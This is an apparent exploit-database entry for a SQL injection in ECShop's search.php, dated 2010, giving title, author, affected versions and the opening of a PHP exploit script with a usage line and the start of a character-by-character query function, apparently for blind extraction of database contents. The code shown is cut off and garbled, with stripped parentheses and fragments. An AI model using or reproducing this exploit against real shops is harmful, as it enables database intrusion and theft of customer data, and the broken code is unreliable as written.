ECShop - 'search.php' SQL Injection
Exploit Title: ECShop Search.php SQL Injection Exploit Date: 2010-05-17 Author: Jannock Software Link: http://www.ecshop.com Version: ECShop All Version Tested on: CVE : WAVDB: WAVDB-01606 Code : ". "\n+ Ex.: php ".$argv0." localhost / 1". "\n\n"; function query$pos, $chr, $chs,$goodid switch $ch...